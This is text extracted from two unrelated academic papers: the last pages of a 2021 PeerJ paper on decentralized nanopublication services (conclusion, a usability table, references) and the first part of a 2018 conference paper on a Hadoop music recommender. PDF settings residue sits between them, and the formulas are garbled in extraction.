of queries can be efficiently answered by at least one of the two types of services, and that these two service types are indeed complementary. The grlc services run reliably and fast on the types of queries they are designed for. The LDF services can run most of these kinds of queries too, albeit in a much slower fashion, and they are reasonably fast for simple kinds of unrestricted queries. The results of the usability study indicate that our Nanobench client application connecting to these services is indeed easily and efficiently usable, even for users with no prior experience in Linked Data publishing. In future work, we are planning to improve a number of aspects of the involved tools and methods. For example, our approach does not yet exploit the full potential of replication in our decentralized setting. Existing work has shown that a client-side algorithm can enable effective load-balancing over TPF servers (Minier et al., 2018), and we plan to extend this work to QPF. As another example, our otherwise decentralized approach currently uses centralized ORCID identifiers. We are therefore investigating decentralized forms of authentication, such as WebID-OIDC (https://github.com/solid/ webid-oidc-spec) or an approach similar to the web of trust (Caronni, 2000), where public Table 2 SUS usability evaluation results. better → SUS questions: odd questions: 1 2 3 4 5 even questions: 5 4 3 2 1 Score 1: I think that I would like to use this system frequently 0 3 9 13 4 65.52 2: I found the system unnecessarily complex. 0 0 3 11 15 85.34 3: I thought the system was easy to use 0 1 1 13 14 84.48 4: I think that I would need the support of a technical person to be able to use this system 1 2 5 7 14 76.72 5: I found the various functions in this system were well integrated 0 1 7 14 7 73.28 6: I thought there was too much inconsistency in this system 0 1 2 15 11 81.03 7: I would imagine that most people would learn to use this system very quickly 0 3 6 14 6 69.83 8: I found the system very cumbersome to use. 0 0 1 17 11 83.62 9: I felt very confident using the system 0 1 6 15 7 74.14 10: I needed to learn a lot of things before I could get going with this system 0 1 4 8 16 83.62 Total: 1 13 44 127 105 77.76 Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 18/23 https://github.com/solid/webid-oidc-spec https://github.com/solid/webid-oidc-spec http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ keys are found based on personal trust relationships that could themselves be published as nanopublications. Such a web of trust could then also allow users in the future to find trustworthy services. This could include meta services whose task is to monitor and test other kinds of services, so clients could make an informed decision on which service instances to rely on. This is currently difficult, as there is no guarantee that all services are well-behaved and return complete and correct results. Clients could already now deal with this by taking random samples of nanopublications from the publishing servers and check whether the query services correctly return them, but this is quite resource intensive. Another issue that needs to be taken care of in future work is identity management when private keys are compromised, lost, or simply replaced as a measure of precaution. For that, we envisage that introduction nanopublications are extended so users can also list old public keys. On top of that, we are going to need a method for users to re-claim old nanopublications they signed with an old key that has since been compromised by a third party (possibly by linking to them with an index nanopublication signed with a new key). This will also require modifications in how we deal with retracted and superseded nanopublications, as they might then be signed with a different key. This is not trivial but can be dealt with within our framework, as opposed to Blockchain-based solutions where identity is inseparably linked to private key access. Currently, users need to install Nanobench locally to ensure secure private key access and proper decentralization, but a more flexible and more powerful handling of private keys as explained above will also allow us to provide login-based public Nanobench instances with their own sets of private keys, which in turn can significantly increase the ease of use of our approach. More work is also needed on the templating features to also cover the provenance and publication info graphs. We also plan to more closely align our templating vocabulary with existing RDF shape standards. Moreover, we are working on making our templating approach more general and more powerful, by adding repeatable statement patterns among other features, such that we can express, for example, templates of templates and thereby allow users to create and publish their own templates directly via Nanobench. The tools and applications we described above in a sense just scratch the surface of what can become possible with our general approach in the nearer future, from Linked Data publications of the latest scientific findings, to formally organized argumentation and automated real-time aggregations. We believe that our approach of semantic micro-contributions could in fact be the starting point of bringing Linked Data publishing to the masses. ADDITIONAL INFORMATION AND DECLARATIONS Funding Ruben Taelman is a postdoctoral fellow of the Research Foundation — Flanders (FWO) (1274521N). Support for Vincent Emonet and Michel Dumontier was provided by the Biomedical Data Translator project funded by National Institutes of Health (No. OT2TR003434-01). Stian Soiland-Reyes was funded by BioExcel-2 (European Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 19/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ Commission H2020-INFRAEDI-02-2018-823830). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Research Foundation—Flanders (FWO): 1274521N. National Institutes of Health: OT2TR003434-01. BioExcel-2 (European Commission): H2020-INFRAEDI-02-2018-823830. Competing Interests Haris Antonatos is employed by SciFY. The authors declare that they have no competing interests. Author Contributions � Tobias Kuhn conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Ruben Taelman performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Vincent Emonet performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Haris Antonatos performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Stian Soiland-Reyes performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Michel Dumontier performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Supplemental data for the performance evaluation is available at Zenodo: Tobias Kuhn, & Vincent Emonet. (2020, August 21). peta-pico/nanopub-services-eval 1.0 (Version 1.0). Zenodo. DOI 10.5281/zenodo.3994068. Supplemental data for the usability evaluation is available at Zenodo: Tobias Kuhn. (2020, August 21). peta-pico/nanobench-usability-eval 1.0 (Version 1.0). Zenodo. DOI 10.5281/zenodo.3994066. The code for Nanobench (release nanobench-1.7) is available at Zenodo: Tobias Kuhn, & Vincent Emonet. (2020, November 26). peta-pico/nanobench: nanobench-1.7 (Version nanobench-1.7). Zenodo. DOI 10.5281/zenodo.4292171. The code for the nanopublication services (release nanopub-services-1.0) is also available at Zenodo: Tobias Kuhn. (2020, November 26). peta-pico/nanopub-services: nanopub-services-1.0 (Version nanopub-services-1.0). Zenodo. DOI 10.5281/zenodo.4291594. Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 20/23 http://doi.org/10.5281/zenodo.3994068 http://doi.org/10.5281/zenodo.3994066 http://doi.org/10.5281/zenodo.4292171 http://doi.org/10.5281/zenodo.4291594 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.387#supplemental-information. REFERENCES Auer S, Bizer C, Kobilarov G, Lehmann J, Cyganiak R, Ives Z. 2007. DBpedia: A nucleus for a web of open data. In: The Semantic Web. Springer DOI 10.1007/978-3-540-76298-0_52. Bangor A, Kortum PT, Miller JT. 2008. An empirical evaluation of the system usability scale. International Journal of Human-Computer Interaction 24(6):574–594 DOI 10.1080/10447310802205776. Baumeister J, Reutelshoefer J, Puppe F. 2011. Knowwe: a semantic wiki for knowledge engineering. Applied Intelligence 35(3):323–344 DOI 10.1007/s10489-010-0224-5. Berners-Lee T. 2009. Linked data. Available at https://www.w3.org/DesignIssues/LinkedData.html. Bizer C, Heath T, Berners-Lee T. 2011. Linked data: the story so far. In: Semantic Services, Interoperability and Web Applications: Emerging Concepts. IGI Global DOI 10.4018/978-1-60960-593-3.ch008. Brooke J. 1996. SUS-a quick and dirty usability scale. In: Jordan PW, Thomas B, Weerdmeester BA, McClelland IL, eds. Usability Evaluation in Industry. Milton Park: Taylor & Francis, 189–194. Buil-Aranda C, Hogan A, Umbrich J, Vandenbussche P-Y. 2013. SPARQL web-querying infrastructure: ready for action? In: The Semantic Web–ISWC 2013. Springer DOI 10.1007/978-3-642-41338-4_18. Buyle R, Taelman R, Mostaert K, Joris G, Mannens E, Verborgh R, Berners-Lee T. 2019. Streamlining governmental processes by putting citizens in control of their personal data. In: International Conference on Electronic Governance and Open Society: Challenges in Eurasia. Springer, 346–359 DOI 10.1007/978-3-030-39296-3_26. Caronni G. 2000. Walking the web of trust. In: WET ICE 2000. Piscataway: IEEE DOI 10.1109/ENABL.2000.883720. Delva H, Rojas Melendez JA, Colpaert P, Verborgh R. 2019. Decentralized publication and consumption of transfer footpaths. First International Workshop on Semantics for Transport 2447:1–7. Feigenbaum L, Todd Williams G, Grant Clark K, Torres E. 2013. SPARQL 1.1 protocol. Rec., W3C. Available at https://www.w3.org/TR/2013/RECsparql11-protocol-20130321/. Ghidini C, Kump B, Lindstaedt S, Mahbub N, Pammer V, Rospocher M, Serafini L. 2009. Moki: the enterprise modelling wiki. In: European Semantic Web Conference. Springer, 831–835 DOI 10.1007/978-3-642-02121-3_65. Guha RV, Brickley D, Macbeth S. 2016. Schema. org: evolution of structured data on the web. Communications of the ACM 59(2):44–51 DOI 10.1145/2844544. Kuhn T. 2008. AceWiki: A Natural and Expressive Semantic Wiki. In: Proceedings of Semantic Web User Interaction at CHI 2008: Exploring HCI Challenges. CEUR Workshop Proceedings. Kuhn T. 2016. Nanopub-java: a Java library for nanopublications. In: Linked Science: Proceedings of the 5th Workshop on Linked Science 2015-Best Practices and the Road Ahead (LISC 2015). Vol. 1572. CEUR Workshop Proceedings, 19–25. Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 21/23 http://dx.doi.org/10.7717/peerj-cs.387#supplemental-information http://dx.doi.org/10.7717/peerj-cs.387#supplemental-information http://dx.doi.org/10.1007/978-3-540-76298-0_52 http://dx.doi.org/10.1080/10447310802205776 http://dx.doi.org/10.1007/s10489-010-0224-5 https://www.w3.org/DesignIssues/LinkedData.html http://dx.doi.org/10.4018/978-1-60960-593-3.ch008 http://dx.doi.org/10.1007/978-3-642-41338-4_18 http://dx.doi.org/10.1007/978-3-030-39296-3_26 http://dx.doi.org/10.1109/ENABL.2000.883720 https://www.w3.org/TR/2013/RECsparql11-protocol-20130321/ http://dx.doi.org/10.1007/978-3-642-02121-3_65 http://dx.doi.org/10.1145/2844544 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ Kuhn T, Barbano PE, Nagy ML, Krauthammer M. 2013. Broadening the scope of nanopublications. In: Extended Semantic Web Conference. Springer DOI 10.1007/978-3-642-38288-8_33. Kuhn T, Chichester C, Krauthammer M, Queralt-Rosinach N, Verborgh R, Giannakopoulos G, Ngomo A-CN, Viglianti R, Dumontier M. 2016. Decentralized provenance-aware publishing with nanopublications. PeerJ Computer Science 2(1):e78 DOI 10.7717/peerj-cs.78. Kuhn T, Dumontier M. 2015. Making digital artifacts on the web verifiable and reliable. IEEE Transactions on Knowledge and Data Engineering 27(9):2390–2400 DOI 10.1109/TKDE.2015.2419657. Kuhn T, Dumontier M. 2017. Genuine semantic publishing. Data Science 1(1–2):139–154 DOI 10.3233/DS-170010. Kuhn T, Willighagen E, Evelo C, Queralt-Rosinach N, Centeno E, Furlong LI. 2017. Reliable granular references to changing linked data. In: International Semantic Web Conference. Springer DOI 10.1007/978-3-319-68288-4_26. Lanthaler M, Gütl C. 2013. Hydra: A vocabulary for hypermedia-driven web APIs. In: LDOW2013. Rio de Janeiro, Brazil, 996. Lisena P, Meroño-Peñuela A, Kuhn T, Troncy R. 2019. Easy web API development with SPARQL transformer. In: International Semantic Web Conference. Cham: Springer DOI 10.1007/978-3-030-30796-7_28. Mansour E, Sambra AV, Hawke S, Zereba M, Capadisli S, Ghanem A, Aboulnaga A, Berners- Lee T. 2016. A demonstration of the solid platform for social web applications. In: 25th International Conference Companion on World Wide Web. Montréal, Québec, Canada, 223–226 DOI 10.1145/2872518.2890529. Meroño-Peñuela A, Hoekstra R. 2016. grlc makes GitHub taste like Linked Data APIs. In: European Semantic Web Conference. Springer DOI 10.1007/978-3-319-47602-5_48. Minier T, Skaf-Molli H, Molli P, Vidal M-E. 2018. Intelligent clients for replicated triple pattern fragments. In: European Semantic Web Conference. Cham: Springer DOI 10.1007/978-3-319-93417-4_26. Mons B, Van Haagen H, Chichester C, Den Dunnen JT, Van Ommen G, Van Mulligen E, Singh B, Hooft R, Roos M, Hammond J, Kiesel B, Giardine B, Velterop J, Groth P, Schultes E. 2011. The value of data. Nature genetics 43(4):281–283 DOI 10.1038/ng0411-281. Schmachtenberg M, Bizer C, Paulheim H. 2014. Adoption of the linked data best practices in different topical domains. In: International Semantic Web Conference. Cham: Springer, 245–260 DOI 10.1007/978-3-319-11964-9_16. Shotton D. 2009. Semantic publishing: the coming revolution in scientific journal publishing. Learned Publishing 22(2):85–94 DOI 10.1087/2009202. Speicher S, Arwe J, Malhotra A. 2015. Linked Data Platform 1.0. W3C Recommendation. Available at https://www.w3.org/TR/ldp/ (accessed 26 February 2015). Taelman R, Steyskal S, Kirrane S. 2020. Towards querying in decentralized environments with privacy-preserving aggregation. In: Proceedings of the 4th Workshop on Storing, Querying, and Benchmarking the Web of Data. Taelman R, Van Herwegen J, Vander Sande M, Verborgh R. 2018. Comunica: a modular SPARQL query engine for the web. In: 17th International Semantic Web Conference DOI 10.1007/978-3-030-00668-6_15. Third A, Domingue J. 2017. Linkchains: exploring the space of decentralised trustworthy linked data. In: Workshop on Decentralizing the Semantic Web 2017. CEUR-WS. Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 22/23 http://dx.doi.org/10.1007/978-3-642-38288-8_33 http://dx.doi.org/10.7717/peerj-cs.78 http://dx.doi.org/10.1109/TKDE.2015.2419657 http://dx.doi.org/10.3233/DS-170010 http://dx.doi.org/10.1007/978-3-319-68288-4_26 http://dx.doi.org/10.1007/978-3-030-30796-7_28 http://dx.doi.org/10.1145/2872518.2890529 http://dx.doi.org/10.1007/978-3-319-47602-5_48 http://dx.doi.org/10.1007/978-3-319-93417-4_26 http://dx.doi.org/10.1038/ng0411-281 http://dx.doi.org/10.1007/978-3-319-11964-9_16 http://dx.doi.org/10.1087/2009202 https://www.w3.org/TR/ldp/ http://dx.doi.org/10.1007/978-3-030-00668-6_15 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ Verborgh R, Vander Sande M, Hartig O, Van Herwegen J, De Vocht L, De Meester B, Haesendonck G, Colpaert P. 2016. Triple Pattern Fragments: a low-cost knowledge graph interface for the Web. Journal of Web Semantics 37-38:184–206 DOI 10.1016/j.websem.2016.03.003. Vrandečić D, Krötzsch M. 2014. Wikidata: a free collaborative knowledgebase. Communications of the ACM 57(10):78–85 DOI 10.1145/2629489. Werbrouck J, Taelman R, Verborgh R, Pauwels P, Beetz J, Mannens E. 2020. Pattern-based access control in a decentralised collaboration environment. In: Proceedings of the 8th Linked Data in Architecture and Construction Workshop. CEUR–WS. Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 23/23 http://dx.doi.org/10.1016/j.websem.2016.03.003 http://dx.doi.org/10.1145/2629489 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ Semantic micro-contributions with decentralized nanopublication services Introduction Background Approach Performance evaluation Usability evaluation Discussion and conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_2dimm6xerfcsnc7w5ji6qhdb7y ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 126 Design and Implementation of Music Recommendation System Based on Hadoop Zhao Yufeng School of Computer Science and Engineering Xi'an University of Technology Shaanxi, Xi’an, China e-mail: zyfzy99@163.com Li Xinwei School of Computer Science and Engineering Xi'an University of Technology Shaanxi, Xi’an, China e-mail: 604013466@qq.com Abstract—In order to solve the problem of information overload of music system under large data background, this paper studies the design scheme of distributed music recommendation system based on Hadoop. The proposed algorithm is based on the MapReduce distributed computing framework, which has high scalability and performance, and can be applied to the calculation and analysis of off-line data efficiently. The music recommendation system designed in this paper also includes client, server interface, database and ETL operation, which can calculate a set of complete recommendation system from user operation end to server and data calculation. In order to improve the accuracy of the recommendation algorithm, this paper introduces k-means clustering algorithm to improve the recommendation algorithm based on user-based collaborative filtering.The experimental results show that the accuracy of the proposed algorithm has been significantly improved after the introduction of k-means. Keywords-Music Recommendation; K-means Clustering; Collaborative Filtering; Recommendation Algorithm; Hadoop I. INTRODUCTION With the development of the mobile Internet, the amount of data generated by mobile APP has increased rapidly in recent years. On July 27, 2017, Trustdata, a well-known mobile big data monitoring platform in China released the "Analysis Report of China Mobile Internet Development in the First Half of 2017" [1]. Among them, mobile music as a high-frequency application, the number of the user be showed a steady growth in the first half of 2017, peak DAU (daily active users) nearly 150 million. Taking Netease cloud music as an example, since its client APP was launched in April 2013,the number of users has reached 300 million, song orders 400 million. Such a huge amount of data makes the traditional single-server data storage and processing becomes more and more clumsy. Moreover, it is more and more difficult for users to find their favorite songs in huge amounts of data. After all, favorite songs are only a few, and finding them one by one can be very difficult. The past practice is that when users want to listen to some songs, they search for them by engines, but only find songs they have known. A lot of songs that users do not know, but will probably like very much, will never be heard. If there is a system specifically for users to push songs, users will spend less time searching for songs, and the stickiness from users to the system will increase. Based on this, this paper uses Hadoop, a big data computing and storage framework, to store and calculate data, so as to solve the problem in finding songs, and also improve user's activity and stickiness. The Hadoop-based recommendation system used in this paper has the following important implications in today's Internet context: 1) To effectively solve the problem of "information overload", to provide users with interesting content by exploring the relationship between users and songs; 2) Hadoop cluster parallel computing and distributed storage technology has good scalability, can effectively handle massive data storage and computing problems; 3) For the enterprise, the system with the recommended function can enhance the user experience and increase the user's activity and stickiness. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 127 II. ALGORITHM BASIS A. Traditional user-based collaborative filtering recommendation algorithm The traditional user-based collaborative filtering recommendation algorithm is based on several users that are most similar to this user's interest, and then recommends songs that the user has not heard from these similar users. The specific method is to find each user by user similarity algorithm some of the most similar users, and then summarize the similar user listening records, from which the target user to find out the songs have not been heard, and then similar users to sort the similarity to obtain The preference of each song, the order of these songs, so as to target users recommend [2]. Specific algorithm steps are as follows: 1) Construct users - song data representation matrix. The row vector represents the user, and the column vector represents each song. The matrix value indicates whether the user has heard of the song, 0 means that it has not been heard, and 1 means it has been heard. It is a 0-1 matrix. 2) Generate the nearest neighbor set. According to the user-song matrix, the similarity algorithm is used to calculate the user's similarity so as to find the user set closest to the target user. Formula (1)[2] calculates the similarity of two users. |)v(N||)u(N| |))i(N|1log( 1 w )v(N)u(Ni uv     （） 3) Produce recommendations. The recommendation value of a song that a similar user has heard while the target user has not heard is determined by the similarity of the user with the target user. A user set must have many users that have heard the same song, and this song's recommended value is the sum of the similarities of these users. In this way, songs that have not been heard by the target user can be sorted according to the recommended values, and songs with high recommendation values will be preferentially pushed to the target user. Equation(2) [2] calculates the user's preference for song i.    )i(N)K,u(Sv viuv rw)i,u(p   B. Introducing the k-means algorithm to optimize the traditional recommendation algorithm Clustering is an unsupervised learning method which aggregates data with similar attributes on the basis of nomanual labeling. It combines data for similarities and the data in the same group have similarities. The data in the different group is different from each other. The improved collaborative filtering recommendation algorithm in this paper is based on the user base with high similarity, so that the algorithm has a better recommendation effect. Similar calculation directly restricts the effectiveness of the clustering effect and thus affects the final recommendation result. The principle of the algorithm is as follows: Suppose there is a group of users User, the total number of users is m, remember to be U (U1, U2, U3, ..., Um), each user Ux has n attributes, recorded as Cx (Cx1, Cx2, Cx3,..., Cxn), the principle of clustering is to compare each attribute on the basis of the set U and divide into the groups of similar users [3]. The core idea of the k-means algorithm is to divide a given group of users into k groups. Within each k group, a cluster center is set to calculate the distance of each data from the center. The minimum distance is attributed to this group. C. k-means clustering algorithm improvement 1) The removal of free points [3]. Of all the data points, the free points are those that are far away from all other points, and their existence will cause the deviation of the center point in the belonging class and thus the classification effect. The process of removing free points in this paper is as follows: Let the total number of users be m, the total number of paths of all users to other users be calculated according to the formula (3): 2 )1(   mm L  Then the sum of all users is:     m i ij ji CCgapD 1 ),( 2 1  )()()(),( 2211 jninjijiji CCCCCCCCgap   2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 128 In formula (5), Ci1, Cj1, ...Cin, Cjn are n attributes of users Ci and Cj. Find the distance average from L and D, formula (6) D L EMV   Formula (6) is the average of all user distances. For each user U, compute the distance U from all other users Lu = (Ui, Uj). If all Lu> = EMV, the user is classified as a free point, a separate category. If the number of free points is small, they can’t be classified into a category for collaborative filtering, so you can classify it to a class that is closest to a type of center point. 2) The selection of random points will also have an impact on the classification results, and fall into the local optimal solution. In order to solve this problem, the method adopted in this paper is to adopt the improved algorithm of clustering: dichotomous clustering [4]. The idea of dichotomous clustering is to first classify all the points as a cluster and then divide it into two (k = 2 k-means clustering), and then select the class that can minimize the clustering cost function again and divide it into two formula until the number of clusters equals k. The cluster cost function is defined as the sum of squared error of the cluster, as shown in formula (7). The largest square error sum of a class, this kind of point in the distance from the center of the maximum distance, you need to be divided once again.    iCp i cpEi 2  III. RECOMMENDED SYSTEM DESIGN This section describes the implementation and testing of the entire system and what frameworks are included in each of the system's features. First of all, introduce the top-level design; then analyze the overall framework of the system, what technologies are needed, and the overall process of the system; finally, we evaluate the recommended results from the accuracy and recall rate of recommendations. A. Recommended process The K-means clustering-based collaborative filtering recommendation algorithm proposed in the previous section is mainly divided into two steps, one is to use k-means to implement user clustering, and the other is to perform a recommendation algorithm based on user collaborative filtering thus generating the recommended result. User song recording data Songs commonly used labels User clustering Collaborative filtering Generate recommended results User similarity Figure 1. Distributed recommended algorithm flow Algorithm parallelization of the flow chart is shown in figure 1. Clustering algorithm is divided into three steps. The first step is to create a user tag model: user log table and song list of commonly used tags through a step MapReduce process to generate user-tag model, the tag file as a cache file for each user's song recording tag statistics in the tag vector Increase the number of each position to generate a user label matrix. The second step is to use k-means algorithm to calculate the cluster center point of user label matrix. After several iterations, the relatively stable center point of each cluster is determined. The third step reads the central point file as a cache, in order to classify users, by calculating the user from which one of the nearest center, put this user into which cluster. The user-based collaborative filtering algorithm will recommend collaborative filtering for users in each cluster.This step is divided into a number of steps, including counting the number of a song being listened to, counting the number of a user listening to music, calculating user similarity, generating recommended results. B. Recommended system architecture design The recommended system is divided into the recommended algorithm layer, server-side and client. The recommended algorithm layer uses Hadoop cluster for distributed recommendation, the server side uses the Java Servlet and MySQL database for development, and the client side uses Android for display[5]. Log collection is 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 129 collected using the ETL tool Sqoop. System overall framework is shown in Figure 2. It can be seen from the figure that the recommended system is divided into 4 major parts: Top-level client, server, database and Hadoop layer. The client uses the Android system for display. Server development uses Java EE development. Database uses MySQL. MySQL is the intermediate data link between the client and the recommendation system. Data is stored in the database so that front-end servers and Hadoop are decoupled. The transfer of data between the database and Hadoop takes the Sqoop. Sqoop is a distributed log collection system based on Hadoop, which requires Hadoop to run, which can also speed up data transfer. The collected data is stored in HDFS. The Hadoop layer is divided into two parts, one is HDFS data storage, and the other is MapReduce distributed computing. MapReduce reads the data from HDFS and calculates it, and then saves the results back to HDFS. Sqoop reads data from the HDFS and transfers to MySQL, the client requests the server at irregular intervals, the server reads data from the database and returns it to the client, and the user's operation of songs is fed back to the server and saved to the database[6]. Hadoop Android WebService MySQL HDFS MapReduce Sqoop Figure 2. Recommended system architecture C. Recommended system function module analysis When users use the recommendation system, the system recommends different songs to different users, which requires users to log in the system with different user names. In order to log in, the system also has to provide the user registration function. To listen to different songs, users must also be able to search for songs and add tags to the songs. Because we have no songs to play, we also need a collection or a favorite feature for users[7]. The server side designs the corresponding interfaces based on these requirements, and the database also designs different tables to store the content. Accordingly, we have designed the function diagram of the system, as shown in Figure 3. As can be seen from the figure, the system function is decomposed into four modules. Clients have user registration, login, search songs, tag songs and play features. Play actually refers to favorites or likes. Because the song involves copyright issues, it can only be replaced by favorites or likes. These functions correspond to the server-side interface to provide data. Data is read from the database, so the database is designed with three tables: the user table, used to register and log in; the table for recording users' listening to songs, with the largest amount of data; song table storage song's basic information, including tag information, search songs and add tags[8]. MySQL Client register login search Add tag play Service Registration interface Login interface Search interface Add interface user tablerecord list of listening to songs Song list Hadoop Collaborative filtering K-means clustering Sqoop Figure 3. Recommended system function block diagram IV. DESIGN OF HADOOPBASED RECOMMENDATION SYSTEM Algorithm parallelization is based on the k-means clustering algorithm introduced in the previous chapter and user-based collaborative filtering recommendation algorithm is implemented in the distributed system, the distributed 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 130 recommendation algorithm is divided into two modules, one is distributed k-means Clustering algorithm, one is the distributed collaborative filtering recommendation algorithm, and finally the two algorithms connected to achieve the work of the entire distributed recommendation algorithm[9]. A. K-means clustering of parallel design The data input of the K-means algorithm is a matrix, because here the user is clustered, so the user-label matrix is first formed by data preprocessing. User listening records are large files and need to be designed in parallel. Listener recorded data into the HDFS behind the addition of each song's label, the formation of (user id, song id, song time, label) this format records. Then use MapReduce to parallelize the user-label matrices in one step. Then the user-label matrix is clustered. The clustering and parallelization algorithm is designed as follows: The first step scans all the original points and randomly selects k points as the center point of the first step cluster. The second step is to calculate the cluster of all the points to each center point, and to point each point to the closest center point cluster. The third step to repeat the second step to meet the termination conditions[10]. The fourth step is to calculate all the user points, the user 